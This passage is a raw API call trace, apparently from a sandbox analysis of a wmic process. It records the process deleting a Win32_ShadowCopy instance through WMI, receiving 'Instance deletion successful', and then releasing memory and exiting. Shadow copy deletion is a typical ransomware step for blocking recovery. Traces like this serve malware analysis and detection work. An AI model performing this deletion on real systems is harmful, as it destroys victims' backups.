Arguments=0x26f808 | out: lpBuffer="뚐B") returned 0x67 [0132.209] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{E369493E-E5B4-449B-8539-770BCA375ABB}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 104 [0132.209] malloc (_Size=0x68) returned 0x61d890 [0132.209] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{E369493E-E5B4-449B-8539-770BCA375ABB}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x61d890, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{E369493E-E5B4-449B-8539-770BCA375ABB}\"\r\n", lpUsedDefaultChar=0x0) returned 104 [0132.209] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff9e2ab0 [0132.209] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 103 [0132.225] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0132.225] free (_Block=0x61d890) [0132.225] free (_Block=0x61d080) [0132.225] LocalFree (hMem=0x42b690) returned 0x0 [0132.225] IWbemServices:DeleteInstance (in: This=0x1e83c18, strObjectPath="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{E369493E-E5B4-449B-8539-770BCA375ABB}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0132.321] IUnknown:Release (This=0x1e83d80) returned 0x0 [0132.321] malloc (_Size=0x800) returned 0x61d080 [0132.321] LoadStringW (in: hInstance=0x0, uID=0xb09e, lpBuffer=0x61d080, cchBufferMax=1024 | out: lpBuffer="Instance deletion successful.\r\n") returned 0x1f [0132.321] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0132.321] malloc (_Size=0x20) returned 0x61cef0 [0132.321] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x61cef0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Instance deletion successful.\r\n", lpUsedDefaultChar=0x0) returned 32 [0132.321] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff9e2ab0 [0132.321] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 31 [0132.322] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0132.322] free (_Block=0x61cef0) [0132.322] free (_Block=0x61d080) [0132.322] IEnumWbemClassObject:Next (in: This=0x1e83d18, lTimeout=-1, uCount=0x1, apObjects=0x26f8b0, puReturned=0x26f8c0 | out: apObjects=0x26f8b0*=0x0, puReturned=0x26f8c0*=0x0) returned 0x1 [0132.323] IUnknown:Release (This=0x1e83d18) returned 0x0 [0132.324] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0132.324] free (_Block=0x61cca0) [0132.324] free (_Block=0x61ccc0) [0132.324] GetCurrentThreadId () returned 0x5b4 [0132.324] ??0CHString@@QEAA@PEBG@Z () returned 0x26fa88 [0132.324] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0x26fa88 [0132.324] lstrlenW (lpString="LIST") returned 4 [0132.324] lstrlenW (lpString="delete") returned 6 [0132.324] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0132.324] lstrlenW (lpString="ASSOC") returned 5 [0132.324] lstrlenW (lpString="delete") returned 6 [0132.324] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0132.324] lstrlenW (lpString="GET") returned 3 [0132.325] lstrlenW (lpString="delete") returned 6 [0132.325] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0132.325] ??1CHString@@QEAA@XZ () returned 0x5e56c201 [0132.325] WbemLocator:IUnknown:Release (This=0x1e83c18) returned 0x0 [0132.325] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0132.325] _kbhit () returned 0x0 [0132.326] free (_Block=0x616f20) [0132.326] free (_Block=0x61cac0) [0132.326] free (_Block=0x61caa0) [0132.326] free (_Block=0x61ca80) [0132.326] free (_Block=0x61ca60) [0132.326] free (_Block=0x6170a0) [0132.326] free (_Block=0x61cb40) [0132.326] free (_Block=0x6185c0) [0132.326] free (_Block=0x61d020) [0132.326] free (_Block=0x61cbc0) [0132.326] free (_Block=0x61cfa0) [0132.326] free (_Block=0x61cae0) [0132.326] free (_Block=0x61cbe0) [0132.326] free (_Block=0x617140) [0132.326] free (_Block=0x616e00) [0132.326] free (_Block=0x61cff0) [0132.326] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0132.326] free (_Block=0x61ce20) [0132.326] free (_Block=0x61cb00) [0132.327] free (_Block=0x61cb20) [0132.327] free (_Block=0x61cf30) [0132.327] free (_Block=0x61cb60) [0132.327] free (_Block=0x617ee0) [0132.327] free (_Block=0x617f30) [0132.327] free (_Block=0x617f80) [0132.327] free (_Block=0x61cb80) [0132.327] free (_Block=0x616a20) [0132.327] free (_Block=0x616de0) [0132.327] free (_Block=0x618040) [0132.327] free (_Block=0x616dc0) [0132.327] free (_Block=0x618000) [0132.327] free (_Block=0x616d60) [0132.327] free (_Block=0x616d80) [0132.327] free (_Block=0x616c40) [0132.327] free (_Block=0x616c60) [0132.327] free (_Block=0x616be0) [0132.327] free (_Block=0x616c00) [0132.327] free (_Block=0x616ca0) [0132.327] free (_Block=0x616cc0) [0132.327] free (_Block=0x616d00) [0132.327] free (_Block=0x616d20) [0132.327] free (_Block=0x616b20) [0132.328] free (_Block=0x616b40) [0132.328] free (_Block=0x616ac0) [0132.328] free (_Block=0x616ae0) [0132.328] free (_Block=0x616b80) [0132.328] free (_Block=0x616ba0) [0132.328] free (_Block=0x616a60) [0132.328] free (_Block=0x616a80) [0132.328] free (_Block=0x6169d0) [0132.328] free (_Block=0x6169a0) [0132.328] free (_Block=0x616e90) [0132.328] WbemLocator:IUnknown:Release (This=0x1e71390) returned 0x2 [0132.328] WbemLocator:IUnknown:Release (This=0x1e83b28) returned 0x0 [0132.328] WbemLocator:IUnknown:Release (This=0x1e83a98) returned 0x0 [0132.329] WbemLocator:IUnknown:Release (This=0x1e71390) returned 0x1 [0132.329] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0132.329] WbemLocator:IUnknown:Release (This=0x1e71390) returned 0x0 [0132.329] free (_Block=0x61c9e0) [0132.329] free (_Block=0x61ca00) [0132.329] free (_Block=0x618540) [0132.329] free (_Block=0x61ca20) [0132.329] free (_Block=0x61ca40) [0132.329] free (_Block=0x618580) [0132.329] free (_Block=0x61c860) [0132.329] free (_Block=0x61c880) [0132.329] free (_Block=0x6183c0) [0132.329] free (_Block=0x61c8a0) [0132.329] free (_Block=0x61c8c0) [0132.329] free (_Block=0x618400) [0132.329] free (_Block=0x61c7e0) [0132.329] free (_Block=0x61c800) [0132.329] free (_Block=0x618340) [0132.330] free (_Block=0x61c820) [0132.330] free (_Block=0x61c840) [0132.330] free (_Block=0x618380) [0132.330] free (_Block=0x61c960) [0132.330] free (_Block=0x61c980) [0132.330] free (_Block=0x6184c0) [0132.330] free (_Block=0x61c9a0) [0132.330] free (_Block=0x61c9c0) [0132.330] free (_Block=0x618500) [0132.330] free (_Block=0x61c760) [0132.330] free (_Block=0x61c780) [0132.330] free (_Block=0x6182c0) [0132.330] free (_Block=0x61c7a0) [0132.330] free (_Block=0x61c7c0) [0132.330] free (_Block=0x618300) [0132.330] free (_Block=0x61c8e0) [0132.330] free (_Block=0x61c900) [0132.330] free (_Block=0x618440) [0132.331] free (_Block=0x61c920) [0132.331] free (_Block=0x61c940) [0132.331] free (_Block=0x618480) [0132.331] free (_Block=0x61c6a0) [0132.331] free (_Block=0x61c6c0) [0132.331] free (_Block=0x618200) [0132.331] free (_Block=0x61c560) [0132.331] free (_Block=0x61c580) [0132.331] free (_Block=0x6180c0) [0132.331] free (_Block=0x616e50) [0132.331] free (_Block=0x616e70) [0132.331] free (_Block=0x618080) [0132.331] free (_Block=0x61c5e0) [0132.331] free (_Block=0x61c600) [0132.331] free (_Block=0x618140) [0132.331] free (_Block=0x61c6e0) [0132.331] free (_Block=0x61c700) [0132.331] free (_Block=0x618240) [0132.331] free (_Block=0x61c5a0) [0132.331] free (_Block=0x61c5c0) [0132.332] free (_Block=0x618100) [0132.332] free (_Block=0x61c620) [0132.332] free (_Block=0x61c640) [0132.332] free (_Block=0x618180) [0132.332] free (_Block=0x61c660) [0132.332] free (_Block=0x61c680) [0132.332] free (_Block=0x6181c0) [0132.332] free (_Block=0x61c720) [0132.332] free (_Block=0x61c740) [0132.332] free (_Block=0x618280) [0132.332] CoUninitialize () [0132.369] exit (_Code=0) [0132.370] free (_Block=0x61cd30) [0132.370] free (_Block=0x617ea0) [0132.370] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0132.370] free (_Block=0x616f40) [0132.370] free (_Block=0x616a40) [0132.370] free (_Block=0x617e60) [0132.370] free (_Block=0x617e20) [0132.370] free (_Block=0x617dd0) [0132.370] free (_Block=0x617d90) [0132.370] free (_Block=0x617d30) [0132.370] free (_Block=0x615a90) [0132.370] free (_Block=0x615a50) [0132.370] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0132.370] free (_Block=0x61cec0) Thread: id = 269 os_tid = 0x614 Thread: id = 270 os_tid = 0x758 Thread: id = 271 os_tid = 0x690 Thread: id = 272 os_tid = 0x34c Thread: id = 273 os_tid = 0xae8